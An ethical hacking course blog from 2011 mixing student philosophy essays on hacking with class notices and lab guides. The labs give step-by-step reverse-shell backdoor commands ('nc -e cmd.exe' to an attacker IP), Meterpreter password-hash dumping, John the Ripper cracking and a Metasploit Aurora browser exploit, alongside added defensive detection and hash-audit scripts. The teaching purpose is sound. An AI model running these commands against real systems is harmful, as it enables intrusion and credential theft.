Thursday, December 15, 2011

Hackers and Moral Desert (not a sweet treat)

The concept of moral desert is a complicated one. Moral Desert states that a person is obligated to something because of something else (the dog gets a biscuit because he's been good), and that result can be either good or bad; the person must accept all consequences be they positive or negative. The actual theory is more complex and the Stanford Encyclopedia of Philosophy gives a much more in-depth explanation (trying to explain it fully here would go way over the maximum word count, so I'll just mention the site).

This theory was famously rejected by the philosopher John Rawls. Rawls claimed that a person's talents were simply the result of 'natural lottery' and so a given individual could not claim credit for and does not morally deserve the results of said talents (better job/salary, award, etc); he does clarify that while he does not accept the underlying concept of moral desert, people can and should expect to receive positive--and only positive--benefits from talent (he calls this 'Legitimate Expectation'). Where the legitimate expectation argument seems to fail is that it states that one only deserves to take credit for results if the individual or group expected them to happen, and the only results that count are positive.

In applying this concept to hacking, a person may not expect the results of an action but it happens anyway. Is it then moral to claim credit for those results? According to the basic moral desert framework, yes. In today's world where exploits can be found with a Google search and skill isn't necessarily required to make use of some powerful tools, not unless the person personalized the results in some way (tweaking source code and adding in a signature, adding a message to a defaced site, etc) so that everyone would know it was them. Hacking results are only claimed by an individual or group if the results are positive (when was the last time you heard of Anon, LulzSec or the like taking credit for a failure?).

When I was in high school, the 'IT department' (one librarian who believed anything on a computer worked exactly the way it was supposed to) used a fairly simple keyword filter with a bad bit of code. It blocked sites based on keywords with no context, resulting in students unable to do research assignments because the filter was blocking a lot of stuff it shouldn't.

I was able to get the password through simple shoulder-surfing (I was just curious and did not expect to be able to actually get the master password). So I disabled the filter when I had an in-class project that otherwise would have been impossible. One teacher saw me doing this and assumed IT had trusted me with the password; I later told her that was not the case. She asked how I got it; I told her, gave her the password, she gave it to a couple other teachers and students were happy. Everyone behaved (the students didn't directly have the password, only teachers) and there were no logs to check. This fails the 'legitimate expectation' argument that Rawls gives, as I used knowledge (not 'natural lottery') to gain these results, but I had no real expectation of being able to circumvent the filter. Nor did I expect or even want credit; I figured that the librarians would probably find some reason to ban me from the computer lab altogether if they found out.

Another possible example of the moral desert theory is the Harvard admissions hack. Prospective students replaced a character string in a URL, and thus were able to view their admissions status in advance. Could it be considered an 'immoral' advantage? Not knowing the whole story, I would think that it depends. If an applicant viewed only their own information while waiting for the letter to arrive in the mail, I would not see that as an unfair advantage as the outcome was already certain. Some might.

You could argue that the person who discovered this flaw in the system did not expect to gain access (the expectation is that databases like that with sensitive information are protected by a password or other barrier to entry from the outside), but we don't know if that is in fact the case. Once the info was published, everyone expected to get in, so that might fall under 'legitimate expectation' (however wrong it may be). However, anyone using the hack must be prepared for the negative consequences as well as the possible positives (moral desert).

John Stuart Mill and Jeremy Bentham - Enjoy the occasional hack.

What would John Stuart Mill and Jeremy Bentham say about hacking?

An interesting idea, and certainly one worth taking a look at. For this blog post, I am focusing on two of the strongest driving forces behind the ideas of Utilitarianism. Utilitarianism is the idea that the proper action, the moral action, is the one that maximizes overall happiness. Bentham states that there are two “sovereign masters” governing mankind, pain and pleasure, and Bentham believes that the proper action would be one that maximizes overall pleasure, while minimizing overall pain. This concept stems from the idea of consequentialism, which states that the morality of an action can be determined only from the outcome of said action. This differs from Kant’s idea of categorical imperative, which can be summed up by saying that some actions, regardless of outcome, are moral or immoral. To really get an idea of these concepts in action, let me employ a lovely example I came across in one of Michael Sandel’s lectures.


Imagine you’re walking along a bridge and you spot a runaway train; it’s zooming along the track, the brakes don’t work, and Denzel Washington is nowhere to be found (If you don’t understand the joke, don’t be discouraged. I assure you it wasn’t that funny anyway). A good distance down the track are five unaware train workers, doing train worker things to the track. Imagine that it is inevitable - if nothing is done, these five train workers are going to die miserable, painful deaths. Now, imagine on that very bridge, an incredibly large man is leaning over the railing directly above the train’s track. You realize that you can save all five of those train workers’ lives if you just push the large man over the railing, and onto the track. This incredibly large man would inevitably die a most unfortunate death, but in the process he will have saved five other people’s lives. So what do you do - do you choose to send one man to his death to save five people, or do you choose to let the train kill the five workers and let the fat man lean against the railing in peace?

The utilitarianist would keep it simple and state that five lives without pain and one life with pain is better than five lives with pain and one without pain, and without much hesitation, send the fat man plummeting to his inevitable end. Obviously, somebody who follows Kant’s idea of categorical imperative would let the five men die, because regardless of whether 5 men die or 1 man dies, this philosophy states that sending a man to his death is, without question, immoral, and thus the wrong decision.

So now that we know how Bentham and Stuart Mill would act in that scenario, what can we assume about their stances on hacking? I believe that both of these gentlemen would support hacking as long as it follows the basic tenets of utilitarianism -- there must be more overall happiness after the hacking than before. Let’s delve into a few scenarios and see the stances they’d take.

Would Bentham/Stuart Mill be okay with hacking into somebody’s wireless network? It depends - if the hacker isn’t in any way infringing on the owner’s speeds, or data privacy, I don’t think they would have a problem with this. Pleasure is gained from free Internet, and if the owner’s experience does not change post-hack, he/she does not feel any pain. If you take a step further, it might be argued that the people who profit from the Internet service provider’s income may suffer, so depending on how much the ISP stands to lose from this hack, Bentham and co. might not approve of the hack.

Would Bentham and co. approve of hacking a child pornography website? Absolutely. Without a doubt these people would view distributors and producers of child pornography as incredible sources of pain for children and families, and to prevent them from creating any more pain, thus minimizing pain and increasing overall happiness, they would hack the website (Stuart Mill has 1337 h@ck3R sk1llz, after all).


And for my final example, would BeneMills approve of hacking Microcenter’s website because he doesn’t like their prices and the manager was a big jerk to him? I believe they would not - they would see that while it may produce a considerable (very, very, very considerable) amount of pleasure for the hacker, it would cause much more pain for customers, workers, and anybody who stands to profit from the website’s operation.


In conclusion, I believe that our friends Bentham and Stuart Mill would approve of hacking - but only after they have analyzed the resulting outcome of said hacks.

Oops!

In my half-awake stupor I forgot to thank both Jamie and Monica for taking us out to lunch. It was awesome and much appreciated. So thank you guys, and thanks for making the class enjoyable and engaging!

John Rawls is Anonymous

John Rawls believed that the greatness your future may or may not behold stems solely from the things you were taught and the talents you were given at birth, and as a child. John Rawls's philosophy is that even with meritocracy you will never be put ahead of someone who is naturally talented. You were either born into a family that raised you to be successful or you were not. However, John Rawls mentions that even those who are naturally talented cannot claim credit because their success may rely on factors such as birth order.

John Rawls also thought that being paid insane amounts of money to do something you were born talented at is unfair. Unless you were using some of that money to give back to the people who lack talent in such things. For instance in the lecture they mentioned the salary of Supreme Court judge Sandra Day O’Connor ($200,000) with the salary of television’s Judge Judy ($25 million). To no surprise, John Rawls would not approve of the pay difference. When I heard John Rawls's take on greed and wealth of the talented people, it made me think about what his opinion would be toward the current actions of Anonymous. I wonder if he were still alive, if he would reject the protesting or support it. Based off what I learned from the lecture, I think John Rawls would want to take part in the protesting and would support the occupy groups. John Rawls was most likely ashamed by present day America with all the overpaid athletes and bone head celebrities. Although, in many instances his theories prove correct. The rich are richer and the poor are getting poorer.

However, I believe that groups such as Anonymous would give John Rawls hope, and maybe even put his theories to the test. Anonymous is a public group of secret members, who claim to be activists for freedom and truth. They claim to be ideas without origin. It started with an image board in Japan. Then they created an image board in English (4chan), where Anonymous only grew in numbers. Anonymous, as I mentioned, is public and completely diverse, holding members of various skill sets; though some are childlike and immature, there are also educated and skilled members. Anonymous has been known for actions such as stealing private information, and taking down inappropriate websites for justice. I don't fully agree with the idea that hard work will never compare to natural talent. Also, the idea that people who come from impoverished families should be given charity by wealthy families. In most cases that theory may hold truth, but not all. I think John Rawls needed to put more faith in the underdog.

I personally think John Rawls would be proud of the current cover of Time magazine (Person of the year: The Protester). I feel John Rawls almost thought of life as a race; it all depends on where you start that determines the outcome of how far you will go. That's why I believe he would be proud of the “underdogs” for fighting against the greed and ridiculous wealth that belong to a select few. John Rawls seemed like he was all about the idea that the talented and wealthy can have tons of money, as long as they help the less fortunate. Many wealthy Americans do give back to the community by giving to charities, but there are also many wealthy people who could care less. I am not sure how John Rawls would feel about all the hacking Anonymous does.

In conclusion, John Rawls believed that the success in your life is determined by your beginning and that no matter how hard you work the person with the “easier” beginning, or farther start will end up ahead of you. Which I do not believe. Also, John Rawls believed that natural talent was more efficient than motivation and effort. John Rawls also believed that the wealthy should have to give some of their money to the less fortunate, because they cannot take credit for their natural talent. I mentioned that I personally believed John Rawls would find Anonymous and the occupy groups intriguing, because they are joining together to fix what they see as wrong in the world.

Aristotle and Anonymous

The hacker ethic is closely related to the virtue ethics found in the writings of Aristotle. Aristotle’s Nicomachean Ethics suggests there is an ultimate good toward which, in the end, all human actions ultimately aim. Virtue Ethics refers to the philosophy that emphasizes being, rather than doing. This means that morality stems from how a person identifies his/her motivations for the action, and the character inherent in that person, and not from actions of that person alone. Ethical choices and examination must be made in each individual situation, based on factors such as personal vs social (group) benefit, and what intentions are present in the person(s) …are they well meant or malevolent? Anonymous is a complex example to examine because by its very nature, it consists of a group of persons of unknown identity, who, despite claiming altruistic intention, may in truth be carrying out actions that benefit a smaller chosen group, although they claim to seek justice for others…or they may be as they seem. In truth, that may fluctuate at every moment, as it is a “many” and not a “one”.

Anonymous was formed on the imageboard 4chan, primarily a place to chat and post images and rambling text (often incoherent or offensive…at this point I’d like to shout out to the /b/tards!). They act at times like a hive mind with no openly recognized leaders, choosing to encourage and inspire group action under an anonymous fictional figurehead (as shown by their logo, a suited figure without a head, instead there is only a question mark, standing in a stance of authority in front of a globe). Starting somewhere around 2006, members of this collective have collaborated through anonymous Internet Relay Chat (IRC), where they communicate in group chats and send each other private messages. There is also the capability to exchange files via FTP/file transfers via IRC. IRC creates a decentralized “war room” in which ideas are exchanged, agreements are made as a group, and plans may be deployed. Actions that follow include DDoS attacks, the public posting of group information mining efforts, exposing as many details as possible to the public eye about offending groups, people or corporations, including security flaws and exploits of websites that may be used by any and all, to create further breaches and attacks. The factor of anonymity and the group collective effort of many (“We are Legion”, they proclaim), can have strong influence on certain social groups in today’s society.

The idea that Anonymous represents is ethical. They represent a symbolic figurehead, an inspiration and identification symbol by which to organize actions with intent towards acts of activism via hacking, or “hacktivism”. Individuals within the whole collective operate in a non-centralized, collective manner that insists on overall agreement in order for such action to succeed despite any petty differences or disagreements, with members working together in order to accomplish set goals. In addition, they put out the call for others to join, adding further strength in numbers. But the question is - is crashing a website, or denying people access to the information or function of it, a morally justified means of protest? Is putting the personal information of a person who has committed a perceived wrong out there helpful? I bring up the case of the “pepper spray cop”, John Pike…are the efforts of publishing his information, that result in lots of pizza, male escorts and such being sent to his home, that he shares with a family who are not at fault, worth it as a form of protest? Is it worth it if only to shame HIS unethical behavior, and do we consider the demoralizing effect this may have on innocent members of his family? In John Pike’s case alone, Aristotle would argue for Distributive Justice…in essence, that people should get what they deserve. In Pike’s case, it could be argued that he “deserves” less respect, authority, and dignity or pride. Certainly it can be said, that despite the resulting actions being petty, that they strip away his dignity and lower the reflection upon him of those traits I have just mentioned. When considering this protest, or any other, the moral reasoning of the protest should be examined. If that action is deemed to NOT fit in the reasoning, and instead commits a wrong to the target by way of the action, then that act of protest should seem morally wrong.
Aristotle’s virtue ethical theory focuses only upon the agent of the chosen action. The actions of a single individual in such an act of protest, compared to the relative morality of the rest of the world, may not be considered ethical, but the scale of justice shifts when it is a mass, faceless collective. It becomes easy to understand them as the Everyman. This gains sympathy – who doesn’t want to see a “bad guy” come to his just deserts, after all?

Wednesday, December 14, 2011

Ethics Blog Post (Exactly 800 Words)

John Locke (even though I disagree with John Locke on many issues I agree with natural rights) was a 17th century philosopher that influenced many other social thinkers, political philosophers, economic theories from all walks of the spectrum. His theories can be applied to a concept that he wouldn’t be so far from, property rights in the modern era.

Property rights in the modern age seem to be dwindling, and no I’m not talking “Me Hate Taxes, Taxes Bad GRR”, I’m talking with modern day electronic devices and digital content where the concept of ownership seems to becoming less than that of the Native Americans. Where and when will people finally see that when you buy an electronic device where you can only do certain things with it “or else” that you don’t really own a product, you are merely leasing it? It’ll probably be where you can’t just smash the device with a shovel for being an ineffective piece of shit without having the manufacturer suing you for improper use. EULAs are turning purchases into leases, destroying property rights.

Take the Sony case, for an example, where a jail breaking (modifying) a Playstation and telling people how to do it could bring on a lawsuit. This brought an outrage in me that if I rented a car and caused damage to it or modified it against their wishes, the rent-a-car company could bring a lawsuit against me and would be completely just in doing so. But if I bought a car and modified it the car salesman or even the car manufacturer could not sue me. John Locke claimed before and would claim today that a civil society was created for the protection of property. Property what is one’s own. That even in the sense of the law (as in if someone broke into my house they would be stealing my PS3, not Sony’s PS3) I would own that Playstation but I could not modify it; even without causing real harm to others, that I could be punished for my actions.

Yes, companies deserve say in what you do with your product ON THEIR systems, just like the state has a say in what you can drive on public roads, and a store has a say in what they will sell. Sony could ban any user that jailbreaks their PS3 from the Playstation network without anyone’s property rights truly being infringed upon. This all falls under natural rights; John Locke could comparatively see this action to another action in his time such as a traded horse with a contract to the new owner that as long as the new owner does not needlessly beat the horse he could ride the horse on trader’s property, but if the new owner needlessly beats his horse he no longer can ride his horse on the trader’s property.

Digital content isn’t owned, it is rented with a onetime fee. And I’m not talking about copyrights; people deserve credit and payment for their work, I’m talking purchased digital content where your ownership be revoked for as simple a reason as they sold it to you for a couple dollars less than they should have. Yes, I am referring to the Kindle books that were deleted from people’s Kindles by Amazon (Ironically it happened to books by George Orwell, Animal Farm and 1984, among others) after they had already paid for the book. This wouldn’t happen in John Locke’s time and comparatively John Locke would see this as a giant abridgment of property rights, one’s labor exchanged for value, and that value traded for goods then become one’s property.

Imagine a scene like this occurring in John Locke’s time, John Locke purchases a book for 10 shillings, he reads it, enjoys it and when he is halfway through the man that sold him the book runs up to him, takes the book right out of his hands and gives back the 10 shillings (for one of many various reasons sold too cheaply, wasn’t an authorized version etc.) which went completely outside of the agreement the men had (Amazon’s ToS). With the government sitting idly by, just allowing this to occur wouldn’t truly be an ideal society or a Civil Society.

Property in the digital age is truly becoming a dying concept; the day will come where true ownership of electronic devices and of property on digital devices becomes a thing of the past, where you do not own an object, you just paid a onetime fee to be allowed to use it. That is the future we face unless we extend current property rights protections to digital content and electronic devices.

OOOO Nooooooo, I am currently not at exactly eight hundred words; I now only have two more words to write right now.

Screw Flanders.

Tuesday, December 13, 2011

Thursday 12/15!

Meet at Chow Thai Cafe at 2:00 PM! Yes, 2:00! If you can't come until 2:30, fiiiiine, we'll start having fun without you.

Make sure you make your final ethics blog post by 11:59 on Thursday. This is more than half of your ethics grade for the course; as a result this is more than 1/6 of your TOTAL final grade for the course. SO DO THE %$#%(% PROJECT!

Monday, December 12, 2011

Last Call....

It is officially the LAST week of classes, and as such I am reminding you that ANY homework assignments you might have missed that are "past due" you should submit by this Thursday, December 15 to receive any credit.

Project 10 we completed in class last week, so if you were in class, you got credit for it.  If you missed that class, you will need to complete it on your own and send me a screenshot to receive credit. 

Project 11 builds on 10 and is due on Thursday!

Reminder: The test on Chapters 11, 12, and 13 will be tomorrow in class!

Ethics blog

Philosopher Immanuel Kant introduced some interesting characteristics of freedom, necessity, justice and right. The word freedom is a powerful word revolving around free will and choice. Necessity can be based on an act performed in order to prevent a greater evil or harm. What about the Justice in an act that constitutes fairness and is there a moral right revolving in such an act?

My ethical hacking term will be based on two computer worm viruses, Stuxnet and Suter. We all know that malicious viruses can create havoc on computer systems by stealing our data, corrupting our software and just causing a big friggin headache! But what if a virus such as Stuxnet and Suter can be used for ethical purposes? A good example would be launching one of these viruses against so called “rogue nations” who are seeking to build nuclear weapons for their evil intentions.

In September of 2007, Israel launched an air strike in Syria that demolished a suspected nuclear plant. Israeli fighter jets were able to cross into Syria undetected due to a virus called Suter, executed by Israel which immobilized Syrian radar defenses. A few years later sometime around November of 2010, Stuxnet was launched against Iran. This virus was used against the Iranian's Natanz nuclear facility plant, which destroyed at least one thousand of their centrifuges. Stuxnet was not only successful in disrupting Iran's nuclear power plant, but this attack is said to also delay Iran's capability in building a nuclear weapon.

So there’s no question a malicious virus that we once thought to be a threat against our computerized systems, may one day become a savior in dismantling a hostile nation's network and thereby disrupting their nuclear weapons plant.

Now we come to the question on whether or not Stuxnet and Suter were morally right from an ethics point of view. What gives an act its moral worth? Does moral worth of an action depend on a motive as in doing the right thing for the right reasons? Was there any justice in sabotaging another country’s computer network? Does the word necessity come into play with a distinct argument that suggests that these viruses were necessary in order to prevent future evil that may one day create unimaginable harm?

We certainly can not predict the future and some will argue that mere assumptions may not be so valid to constitute such a right to deliver a virus attack against other countries. But is it best to be safe than sorry? Do we sit back and wait to see Iran’s true intentions of nuclear capability? If so, will we regret later on by not taking the necessary form of action to prevent their use of nuclear weapons? Is it morally right in creating viruses for the purpose of good when we have always dubbed viruses as malicious code? I guess it all depends on the situation.

Take for example an unethical incident in the country of Estonia, in 2007 that country was literally shut down by an unknown virus code. The virus took down the country's government web sites, banks and other financial firms. This attack is speculated to originate from Russia after a controversial debate on relocating a Soviet era monument within Estonia. Was this virus morally and ethically right over a statue? If so, I see no justice to shut down a peaceful country who wanted to forget the darkness of communism that once reigned on its sovereignty. Perhaps our comrades had too much vodka and took it overboard?

Regardless, it is possible that malicious code may very well become helpful in dealing with future 21st century technological threats. The creation of such a virus in my opinion certainly has an ironic twist to it and we need to analyze that from certain perspectives. The use of such a virus may now have some good intentions towards preventing something drastic in the near future. One may call it a necessity.

I believe we will witness an extraordinary event involving a virus, which will help save millions or perhaps billions of lives around the world. When it comes to the word virus, we immediately think of a malicious code with potential destruction. But what we really should be asking ourselves is, is it morally and ethically right to launch a virus for good intentions and if so, will it have a moral worth to it? Again, will that moral worth of an act have some kind of motive towards doing the right thing and for the right reasons in hopes of preventing a greater harm from rogue nations? Only time will tell, great philosopher Immanuel Kant once said “So act that your principle of action might safely be made a law for the whole world.”

Saturday, December 10, 2011

Scams

There's a show on History Channel (HD feed; not sure if it's also on the standard version) right now about assorted scams, how they play out and how/why people fall for them.

Tuesday, December 6, 2011

Give this one a try.

Want to work for British intelligence? All you have to do is crack the code.

http://canyoucrackit.co.uk/index.asp

Scammers work around two-factor authentication

http://slashdot.org/story/11/12/06/0321250/scammers-work-around-two-factor-authentication-with-social-engineering

Not all that surprising, given how lax some people can be with internet securification...

Thursday, December 1, 2011

Chapter assignments!

Don't forget: you're asked to present on one of the chapters on Thursday!

Here is the list of who will present on which chapter:

Chapter 11: Rob, Karl, Joe
Chapter 12: Marie, Isabel, Sean
Chapter 13: Orlando, Vinny, Corey

sodqv

Phhw dw fkrz wkdl fdih iru oxqfk rq ghf 48.

Overheard in Ethical Hacking

"The smiley face is an L."

L, for I effing Love this class. Thanks for letting me play and learn with you real computer people this semester.

of interest, and a damn good read

Cryptonomicon by Neal Stephenson

One of my favorite authors, and a great book. Also, related to the topic!

Project 11 - Setting Up a Reverse Shell, Dumping Passwords, and Cracking Passwords

 Using Netcat to Set Up a Reverse Shell

Exercise 1: using Netcat for a reverse shell: in the following exercise, you will use the Meterpreter payload from the previous lab to set up a Netcat listener (AKA reverse shell). This will allow you to remotely control the target system after you close your Meterpreter session and thus, come back to the target system whenever you want:
1. The first step in setting up a Netcat listener is to get the Netcat executable on the target system so it can be used to interact with your attack system. There are a number of ways this can be accomplished. You’ll use Trivial File Transfer Protocol (TFTP) to copy the Netcat executable from your BackTrack system to the target system

2. In the bottom left of your BackTrack desktop, click the dragon-looking icon/Services/TFTPD/Start TFTPD. This will start the TFTP daemon (or server service) on your BackTrack system. You should get a message that the TFTPD is running on port 69 and the home directory is /tmp. Click the OK button

3. You are now going to copy the Netcat executable from its default location (/pentest/windows-binaries/tools) to the /tmp directory on your BackTrack system so it can be TFTPed down from the target system. To do so, open a new shell (leave the current Meterpreter shell open) and type the following (only type what’s in bold):
user1@pentest:~#cp /pentest/windows-binaries/tools/nc.exe /tmp

4. Change into the /tmp directory and list the contents of this directory (only type what’s in bold):
user1@pentest:~#cd /tmp
user1@pentest:~#ls -al
Look for the nc.exe file in this directory

5. Leave this shell open

6. Go to the Meterpreter shell you left open. At the Windows command shell prompt, type the following (only type what’s in bold):
C:\WINDOWS\system32>tftp -i BackTrack_IP_address get nc.exe
Syntax breakdown:
tftp: program name
-i: specifies the binary image transfer mode (which means to move the binary file byte by byte)
BackTrack_IP_address: IP address of your BackTrack system
get nc.exe: transfers the nc.exe file from your BackTrack system to the target system
If the file transfer was successful, you should see a message similar to this: “Transfer successful: 59392 bytes in 1 second, 59392 bytes/s”

7. Now you will set up both the client and server portions of the backdoor

8. In the second shell you opened in step #3 (not the Meterpreter shell), start the Netcat program on your BackTrack system in listening mode (server mode) by typing the following (only type what’s in bold):
user1@pentest:~# nc -v -l -p 3333
Syntax breakdown:
nc: program name
-v: verbose mode
-l: listen mode (listen for inbound connections)
-p 3333: local listening port on the BackTrack system

9. From the Meterpreter shell (where you have the Windows command shell prompt open on the target system), start the client side of the Netcat backdoor (only type what’s in bold, on one line):
C:\WINDOWS\system32>nc -e cmd.exe BackTrack_IP_address 3333
Syntax breakdown:
nc: program name
-e cmd.exe: program to execute once the connection is established
BackTrack_IP_address 3333: your BackTrack system’s IP address and listening port for incoming connections
This will shovel a Windows command shell from the target system to your BackTrack system, appearing in the non-Meterpreter shell you opened in step #3

10. Close the Meterpreter shell window (click the X in the upper-right corner of the window)

11. Notice your BackTrack prompt has turned into a Windows command shell prompt. You now have a backdoor into the target system

12. Type (only type what’s in bold):
C:\WINDOWS\system32>dir nc.exe

13. Leave your Netcat listener shell open
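
From the monitoring side, the steps above leave three distinct process-creation traces on the target system: a TFTP client fetching an executable, a program started with `-e cmd.exe` and a remote address, and a command shell whose parent is Netcat. The Python below is an added example, not part of the original lab, that matches each trace; the event records are constructed and their (parent, image, command line) layout is an assumption to map onto your own process-creation logs.

```python
import re
from ntpath import basename

# Constructed process-creation records as (parent image, image, command line).
# The layout is an assumption; map it to your own telemetry fields.
EVENTS = [
    (r"C:\WINDOWS\system32\cmd.exe", r"C:\WINDOWS\system32\tftp.exe",
     "tftp -i 192.0.2.10 get nc.exe"),
    (r"C:\WINDOWS\system32\cmd.exe", r"C:\WINDOWS\system32\nc.exe",
     "nc -e cmd.exe 192.0.2.10 3333"),
    (r"C:\WINDOWS\system32\nc.exe", r"C:\WINDOWS\system32\cmd.exe", "cmd.exe"),
    (r"C:\WINDOWS\explorer.exe", r"C:\WINDOWS\system32\cmd.exe", "cmd.exe /c dir"),
]

SHELLS = {"cmd.exe", "powershell.exe"}
NETCAT_NAMES = {"nc.exe", "ncat.exe", "netcat.exe"}
EXECUTABLE = re.compile(r"\.(exe|dll|bat|ps1)$")
IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def classify(parent, image, cmdline):
    """Return the names of the rules that one process-creation event matches."""
    hits = []
    image, parent = basename(image).lower(), basename(parent).lower()
    args = cmdline.lower().split()

    # Rule 1: TFTP client in binary mode (-i) fetching an executable file.
    if image == "tftp.exe" and "-i" in args and "get" in args:
        if any(EXECUTABLE.search(a) for a in args[args.index("get") + 1:]):
            hits.append("tftp_binary_download")

    # Rule 2: "-e <shell>" together with a remote IPv4 address. Matching on
    # arguments rather than the image name still catches a renamed nc.exe.
    for flag, value in zip(args, args[1:]):
        if flag == "-e" and basename(value) in SHELLS and any(map(IPV4.match, args)):
            hits.append("shell_bound_to_socket")
            break

    # Rule 3: a command shell whose parent process is a Netcat binary.
    if image in SHELLS and parent in NETCAT_NAMES:
        hits.append("shell_child_of_netcat")
    return hits

def scan(events):
    """Map event index -> matched rules, leaving out events that match nothing."""
    return {i: r for i, e in enumerate(events) if (r := classify(*e))}

if __name__ == "__main__":
    for idx, rules in scan(EVENTS).items():
        print(idx, EVENTS[idx][2], "->", ", ".join(rules))
```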

Exercise 2: Using Meterpreter to Dump Windows Password Hashes
In the following exercise, you will use the built-in capability of the Meterpreter payload to dump the password hashes of the accounts on your target system. These hashes will be used later in password cracking attempts, with the ultimate goal of getting additional usernames and passwords:

1. Close your reverse shell and return to the Meterpreter prompt (only type what’s in bold):
C:\WINDOWS\system32>exit

2. With a Meterpreter shell in place type (only type what’s in bold):
meterpreter > hashdump

3. The contents of the target system’s password hash file are output to the screen.
The hashdump output contains user account information and looks as follows:
Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582:::
User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904:::
User2:1012:AC5BA6A944526699AAD3B435B51404EE:F07A9DFFFC2C5C7F9D9EBC83FD69D68E:::
User3:1013:E7EED3F5C2C85B88AAD3B435B51404EE:6AA15B3D14492D3FA4AA7C5E9CDC0E6A:::
The fields are separated by colons. The fields are:
 1st field: username (Administrator, User1, etc.)
 2nd field: Relative Identifier (RID): the last 3-4 digits of the Security Identifier (SID), which are unique to each user
 3rd field: LM hash
 4th field: NTLM hash

4. Based on previous lab techniques, determine a way to get the contents of the hashdump output from your BackTrack system to your Windows attack system

5. Save the file as hashes.txt to the c:\temp drive on your Windows attack system

Exercise 3: Cracking Windows Password Hashes Using John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of *NIX, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak passwords. In the rest of this lab, John the Ripper will be referred to as John. In the following exercise, you will use the command-line version of John to crack the LM password hashes from your target system:

1. Get the password hashes from your target system to your BackTrack system, saving them in /root/ceh, in a file called hashes.txt

2. Change into the directory where John is located (only type what’s in bold):
user1@pentest:~# cd /pentest/passwords/jtr
user1@pentest:~# pwd
/pentest/passwords/jtr

3. Type (only type what’s in bold):
user1@pentest:~# ./john /root/ceh/hashes.txt
Syntax breakdown:
./john: program name
/root/ceh/hashes.txt: the password hashes from your target system
Your output will look something like this:
Loaded x password hashes with no different salts (NT LM DES [32/32 BS])
PACHYDE (smendez?e?:1)
RM (smendez?e?:2)
guesses: x time: 0:00:08:23 100% c/s: 9204K trying: ZYUUZOK - ZZZZZZZ

4. In a second BackTrack shell, use the --show option to display the password cracking status (only type what’s in bold):
user1@pentest:~# ./john --show /root/ceh/hashes.txt | less

NOTE: you will need to re-run this command multiple times to get the latest information relating to cracked passwords and remaining hashes left to crack
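
The four hashdump fields from Exercise 2 and the `:1` and `:2` suffixes in John's output above both follow from how LM stores a password as two separately hashed 7-character halves with no salt. The Python below is an added example, not part of the original lab: it parses hashdump-format lines (the sample is the output shown in Exercise 2) and reports, without cracking anything, which accounts still store an LM hash, which passwords must be 7 characters or fewer, and which accounts share a password. The function names and finding strings are hypothetical.

```python
EMPTY_LM_HALF = "AAD3B435B51404EE"  # LM hash of an empty 7-character half
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"  # NT hash of the empty password

# The sample lines printed in Exercise 2 of this lab.
SAMPLE = """\
Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582:::
User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904:::
User2:1012:AC5BA6A944526699AAD3B435B51404EE:F07A9DFFFC2C5C7F9D9EBC83FD69D68E:::
User3:1013:E7EED3F5C2C85B88AAD3B435B51404EE:6AA15B3D14492D3FA4AA7C5E9CDC0E6A:::
"""

def parse(text):
    """Yield (user, rid, lm, nt) from user:RID:LM:NT::: lines."""
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.strip().split(":")
        if fields == [""]:
            continue  # blank line
        if len(fields) < 4 or len(fields[2]) != 32 or len(fields[3]) != 32:
            raise ValueError(f"line {n}: not in hashdump format")
        yield fields[0], int(fields[1]), fields[2].upper(), fields[3].upper()

def audit(text):
    """Return {user: [findings]} using only properties visible in the hashes."""
    accounts = list(parse(text))
    nt_owners = {}
    for user, _rid, _lm, nt in accounts:
        nt_owners.setdefault(nt, []).append(user)
    report = {}
    for user, _rid, lm, nt in accounts:
        findings = []
        if nt == EMPTY_NT:
            findings.append("blank password")
        # An all-empty LM field means no LM hash is stored for the account.
        if lm != EMPTY_LM_HALF * 2:
            findings.append("LM hash stored")
            # LM hashes each 7-character half separately, so an empty second
            # half reveals the length bound without any cracking.
            if lm[16:] == EMPTY_LM_HALF:
                findings.append("password is 7 characters or fewer")
        # LM and NT hashes are unsalted: equal hashes mean equal passwords.
        shared = [u for u in nt_owners[nt] if u != user]
        if shared and nt != EMPTY_NT:
            findings.append("same password as " + ", ".join(shared))
        report[user] = findings
    return report

if __name__ == "__main__":
    for user, findings in audit(SAMPLE).items():
        print(f"{user}: {'; '.join(findings) or 'no findings'}")
```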

Project 10 - Browser Exploit Using Metasploit

In the following exercise, you will use Metasploit from the BackTrack distribution to deliver an exploit to a vulnerable version of Internet Explorer:

1. From a BackTrack shell, navigate to the Metasploit Framework 3 folder (only type what’s in bold):
user1@pentest:~# cd /pentest/exploits/framework3
user1@pentest:~# pwd
/pentest/exploits/framework3

2. Open the Metasploit Framework console (only type what’s in bold):
user1@pentest:~# ./msfconsole

3. You are now going to set up Metasploit to use the Aurora exploit, made famous in December, 2009, when Chinese hackers launched this malware (and a host of others) against Google and 35 other multinational companies (only type what’s in bold):
msf > use windows/browser/ms10_002_aurora

4. Set the IP address of your BackTrack system, which will run a web server hosting the exploit (only type what’s in bold):
msf exploit (ms10_002_aurora) > set SRVHOST BackTrack_IP_Address
SRVHOST => BackTrack IP Address

5. Next, set the Meterpreter payload to launch a reverse shell once the victim visits the web server being hosted on your BackTrack system (only type what’s in bold, on one line):
msf exploit (ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

6. Set the following option for the Meterpreter payload (only type what’s in bold):
msf exploit (ms10_002_aurora) > set LHOST BackTrack_IP_Address
LHOST => BackTrack IP Address

7. You are now ready to launch the exploit (only type what’s in bold):
msf exploit (ms10_002_aurora) > exploit

Your output should look as follows:
[*] Exploit running as background job.
[*] Started reverse handler on BackTrack_IP_Address:4444
[*] Using URL: http://BackTrack_IP_Address:8080/text_string - select and copy the URL being outputted here
[*] Server started.
msf exploit (ms10_002_aurora) >

8. Leave this shell open - you will return to it shortly

9. Log into your Victim Windows system

10. Open Internet Explorer

11. Paste the URL from step #7 into the address bar and hit ENTER

12. Switch back to your BackTrack system
You should see the following output:
